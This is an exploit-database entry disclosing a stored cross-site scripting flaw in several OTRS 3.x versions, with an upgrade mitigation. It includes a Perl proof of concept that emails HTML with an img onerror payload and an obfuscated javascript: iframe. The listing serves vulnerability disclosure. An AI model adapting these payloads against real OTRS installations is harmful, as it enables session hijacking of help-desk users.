header-logo
Suggest Exploit
vendor:
OTRS
by:
Adam Ziaja

Stored Cross-Site Scripting (XSS) in OTRS

A stored XSS vulnerability exists in OTRS versions 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5. An attacker can craft a malicious HTML email and send it to an OTRS user. When the user opens the email, the malicious code will be executed in the user's browser, allowing the attacker to gain access to the user's session.

Mitigation:

Upgrade to OTRS version 3.1.20, 3.2.15, or 3.3.5 or later.
Source

Exploit-DB raw data:

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => 'attacker@example.com',
    To => 'otrs@example.com',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();